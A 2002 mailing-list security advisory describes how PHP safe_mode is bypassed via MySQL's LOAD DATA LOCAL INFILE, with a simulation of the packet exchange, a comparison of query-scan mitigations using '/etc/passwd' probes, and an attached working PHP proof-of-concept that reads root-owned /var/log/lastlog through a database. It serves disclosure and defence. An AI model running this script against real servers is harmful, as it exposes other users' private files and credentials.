PHP Safe Mode Filesystem Circumvention Problem

From: Dave Wilson (dw@DAHOMELANDS.NET)
Date: 02/03/02


Date:         Sun, 3 Feb 2002 22:21:44 +0000
From: Dave Wilson <dw@DAHOMELANDS.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ------------------------------------------------------------------------------

                         Security Advisory DW020203-PHP
                           Release: 3rd February 2002

                 PHP Safe Mode Filesystem Circumvention Problem

 Severity: Medium to high.
 Affects: PHP, all versions that include the safe_mode feature.
 Platform: UNIX, Microsoft Windows, any platforms on which PHP is available.
 Vendor: http://php.net.
 Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
             PHP 4.1.0 & Apache 2 on Linux.

 ------------------------------------------------------------------------------

VULNERABILITY IN BRIEF

   PHP (since version 3) includes a commonly used feature known as Safe Mode.
   When enabled, scripts are severely limited in their ability to access or
   execute local files, among other things; in particular, a script may only
   open files owned by the same user that owns the script.

   PHP performs these checks in a wrapper around its own filesystem calls, but
   unfortunately the bundled MySQL client library has not been modified to
   perform them for "LOAD DATA LOCAL INFILE" statements. On such a statement
   the server asks the client for the named file, and libmysql opens and sends
   it itself, without ever going through a PHP file function, so the safe_mode
   check never runs.

   If an attacker has access to a MySQL server (either one provided by you or
   one he runs himself), he can use it as a proxy through which to download
   files residing on the safe_mode-enabled web server. The file is read with
   the privileges of the web server process, so anything that process can
   read is within reach. For large ISPs relying on this feature to keep
   individual customers' files private, it could mean clients reading each
   other's files, or reading files on an improperly secured server.
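
   The mechanism above, as an added example that is not part of the advisory
   and is not PHP or MySQL code: the packet exchange that LOAD DATA LOCAL
   INFILE triggers, with the server and a libmysql-like client modelled in
   one Python process. The packet framing and the 0xFB request follow the
   MySQL client/server protocol; the file system, owner UIDs and file
   contents are constructed stand-ins, and the script_uid argument transplants
   safe_mode's owner rule onto the client so the two behaviours can be
   compared side by side.

```python
# Added example, not part of the advisory or of PHP/MySQL: the packet exchange
# behind LOAD DATA LOCAL INFILE, with both sides in one process, and the owner
# check that safe_mode applies to PHP's own file functions bolted onto the
# client side. Packet framing and the 0xFB request follow the MySQL client/
# server protocol; the file system and owner UIDs are constructed stand-ins.
import struct

LOCAL_INFILE_MARKER = 0xFB   # first payload byte of the server's "send me this file" packet
CHUNK = 16                   # tiny on purpose so the chunking is visible; libmysql uses larger buffers


def frame(payload, seq):
    """MySQL packet: 3-byte little-endian length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def unframe(packet):
    """Return (seq, payload) of one framed packet."""
    length = struct.unpack("<I", packet[:3] + b"\x00")[0]
    return packet[3], packet[4:4 + length]


def server_requests_local_file(filename, seq=1):
    """What mysqld sends after parsing LOAD DATA LOCAL INFILE '<filename>'.

    Nothing ties this packet to the statement the client sent: a rogue server
    (the 'provided by himself' case in the advisory) can answer SELECT 1 with it.
    """
    return frame(bytes([LOCAL_INFILE_MARKER]) + filename.encode(), seq)


class SafeModeViolation(Exception):
    """Raised by the hardened client when the file owner differs from the script owner."""


def client_handles_request(packet, fs, script_uid=None):
    """Mimic libmysql's reaction to the 0xFB request.

    fs maps path -> (owner_uid, contents); it stands in for stat() and read().
    script_uid=None reproduces the behaviour the advisory describes: the path
    the server names is read and shipped back, with no PHP check involved.
    script_uid=<uid> adds safe_mode's rule: the file must be owned by the
    same user as the running script.
    Returns the packets the client writes back (file chunks, then an empty
    packet meaning end of file).
    """
    seq, payload = unframe(packet)
    if not payload or payload[0] != LOCAL_INFILE_MARKER:
        raise ValueError("not a LOCAL INFILE request")
    path = payload[1:].decode()

    if path not in fs:
        # open() failed: the client just sends the end-of-file packet and the
        # server reports the error.
        return [frame(b"", seq + 1)]

    owner, data = fs[path]
    if script_uid is not None and owner != script_uid:
        raise SafeModeViolation(
            "%s is owned by uid %d but the script runs as uid %d" % (path, owner, script_uid))

    out = []
    for offset in range(0, len(data), CHUNK):
        seq += 1
        out.append(frame(data[offset:offset + CHUNK], seq))
    out.append(frame(b"", seq + 1))
    return out


def server_reassembles(packets):
    """Concatenate the chunks the client sent, stopping at the empty packet."""
    data = b""
    for packet in packets:
        _, payload = unframe(packet)
        if not payload:
            break
        data += payload
    return data


def fetch_via_proxy(filename, fs, script_uid=None):
    """Run the whole exchange and return the bytes that reach the server."""
    request = server_requests_local_file(filename)
    reply = client_handles_request(request, fs, script_uid)
    return server_reassembles(reply)


# Constructed stand-in for the web server's file system: path -> (owner uid, bytes).
FS = {
    "/var/log/lastlog": (0, b"\x00" * 40 + b"root-owned binary data"),
    "/home/alice/public_html/config.php": (1001, b"<?php $dbpass = 'alice-secret'; ?>"),
    "/home/bob/public_html/index.php": (1002, b"<?php echo 'bob'; ?>"),
}

if __name__ == "__main__":
    # Unpatched client (the advisory's case): bob's script pulls alice's config and root's lastlog.
    print(fetch_via_proxy("/home/alice/public_html/config.php", FS))
    print(len(fetch_via_proxy("/var/log/lastlog", FS)), "bytes of lastlog")
    # Hardened client: the same request from bob's script (uid 1002) is refused.
    try:
        fetch_via_proxy("/home/alice/public_html/config.php", FS, script_uid=1002)
    except SafeModeViolation as e:
        print("refused:", e)
```

   With script_uid=None the client does exactly what the advisory describes:
   it ships whatever path the server names, and the server ends up holding a
   byte-for-byte copy. Nothing in the request says which statement provoked
   it, which is why a server the attacker runs himself works as well as the
   ISP's own, and why the only place a check can live is the client's file
   open.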

FIX

   Currently, no fix exists. Until one is available you can block the mysql_*
   functions outright (for example with the disable_functions directive in
   php.ini), or secure your servers in a proper fashion. A suggested fix for
   the PHP developers might be to scan mysql_query() arguments for strings
   similar to "LOAD DATA LOCAL INFILE", but note that such a scan is easy to
   evade (keyword case, comments, whitespace, the optional LOW_PRIORITY or
   CONCURRENT keyword) and useless against a rogue server, which may reply to
   any statement at all with a file request. A robust fix has to be applied
   where the client library opens the file, or must turn the client's LOCAL
   INFILE support off altogether (the MySQL C API exposes this as the
   MYSQL_OPT_LOCAL_INFILE option of mysql_options(), in client libraries that
   have it).

   Happy hackers out there who are interested in fixing this problem might
   like to look at libmysql.c:1764, although the fix may only be possible from
   within PHP.
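
   The suggested string scan, as an added example (not code from the advisory
   or from PHP): the scan as proposed beside a matcher that first folds the
   spellings mysqld accepts, both run over constructed probe statements.

```python
# Added example, not from the advisory: the string scan it suggests for PHP's
# mysql_query() beside a normalising matcher, run over constructed probe
# statements. It shows why a scan is at best a stop-gap.
import re

NAIVE_NEEDLE = "LOAD DATA LOCAL INFILE"


def naive_blocks(sql):
    """The advisory's suggestion: refuse queries containing the literal phrase."""
    return NAIVE_NEEDLE in sql


def normalise(sql):
    """Fold the freedoms mysqld's parser allows: /* */ and line comments count
    as whitespace, keywords are case-insensitive, any whitespace run is one space."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"(--[ \t].*|#.*)$", " ", sql, flags=re.M)
    return " ".join(sql.upper().split())


# LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE ... per the MySQL grammar.
LOAD_LOCAL = re.compile(r"\bLOAD DATA (?:(?:LOW_PRIORITY|CONCURRENT) )?LOCAL INFILE\b")


def normalised_blocks(sql):
    """Refuse the statement if, after normalisation, it is a LOCAL INFILE load."""
    return LOAD_LOCAL.search(normalise(sql)) is not None


# Constructed probes: the first is the textbook form, the rest are trivially
# different spellings that mysqld accepts.
PROBES = [
    "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE t",
    "load data local infile '/etc/passwd' into table t",
    "LOAD DATA /* safe_mode? */ LOCAL INFILE '/etc/passwd' INTO TABLE t",
    "LOAD DATA LOW_PRIORITY LOCAL INFILE '/etc/passwd' INTO TABLE t",
    "LOAD\tDATA\n  LOCAL\tINFILE '/etc/passwd' INTO TABLE t",
]


def evaluate(probes=PROBES):
    """Return (naive_hits, normalised_hits) so the two scans can be compared."""
    return (sum(naive_blocks(p) for p in probes),
            sum(normalised_blocks(p) for p in probes))


if __name__ == "__main__":
    for p in PROBES:
        print("naive=%-5s normalised=%-5s %r" % (naive_blocks(p), normalised_blocks(p), p))
```

   The naive scan catches one probe in five; the normalising matcher catches
   all five, and still ignores a plain server-side LOAD DATA INFILE, which
   reads the database server's own disk and is a separate matter. Even so,
   it only inspects statements the script sends: a rogue server answers any
   statement with the file request, so no scan of query text helps there,
   and the matcher cannot tell a keyword from the same text inside a string
   literal, so it errs on the side of blocking.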

EXAMPLE

   The attached script will (once its connection settings have been filled in)
   attempt to read "/var/log/lastlog" via the SQL daemon and return it to the
   client. lastlog is owned by root, so a customer's script could never open
   it directly under safe_mode; fetched through the database it comes back
   byte for byte. No FILE privilege is involved on the MySQL side, since the
   file is read by the client, not by mysqld.

   $ cp safe_mode.php /www
   $ wget -qO lastlog_via_mysql localhost/safe_mode.php
   $ diff /var/log/lastlog lastlog_via_mysql; echo $?
   0

COMMENTS

   Due to the nature of the PHP project, development is very rapid and hence
   many sites do not keep up with the latest PHP versions. If a fix were
   available, it would take quite a while to propagate.

   It is likely that this is not an isolated problem in PHP; my bets are on
   PostgreSQL and other PHP database extensions missing this one too.

   The MySQL support has been enabled in PHP by default for as long as I can
   remember.

DAVE WILSON

   Currently residing in Belfast, Northern Ireland, he is available for work
   relating to network security auditing, post-attack recovery and forensics,
   and penetration testing. He may be contacted at <dw@dahomelands.net>. If
   you have any comments regarding this advisory, please contact him directly.

Sun Feb 3 21:23:03 GMT 2002 -dw

   safe_mode.php (the attached script, decoded from the uuencoded attachment):

<?

/*
   PHP Safe Mode Problem

   This script will connect to a database server running locally or otherwise,
   create a temporary table with one column, use the LOAD DATA statement to
   read a (possibly binary) file, then reads it back to the client.

   Any type of file may pass through this 'proxy'. Although unrelated, this
   may also be used to access files on the DB server (although they must be
   world-readable or in MySQLd's basedir, according to docs).
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'test_database';

$filename = '/var/log/lastlog';     /* File to grab from [local] server */
$local = true;                      /* Read from local filesystem */


$local = $local ? 'LOCAL' : '';

$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   /* Terminators that never occur in the file and no escape character, so
      the whole file lands in one field of one row with its bytes untouched. */
   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   /* Only the SELECT yields a result set; the other statements return true. */
   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAjxds+sACgkQs0ye6vw1XQFp4ACgktwtq2IXVxhY1gXOSfmnRpa5
MBMAnjqqAm/KKS0A4EzaRTa7fpdCAbk7
=DP/f
-----END PGP SIGNATURE-----
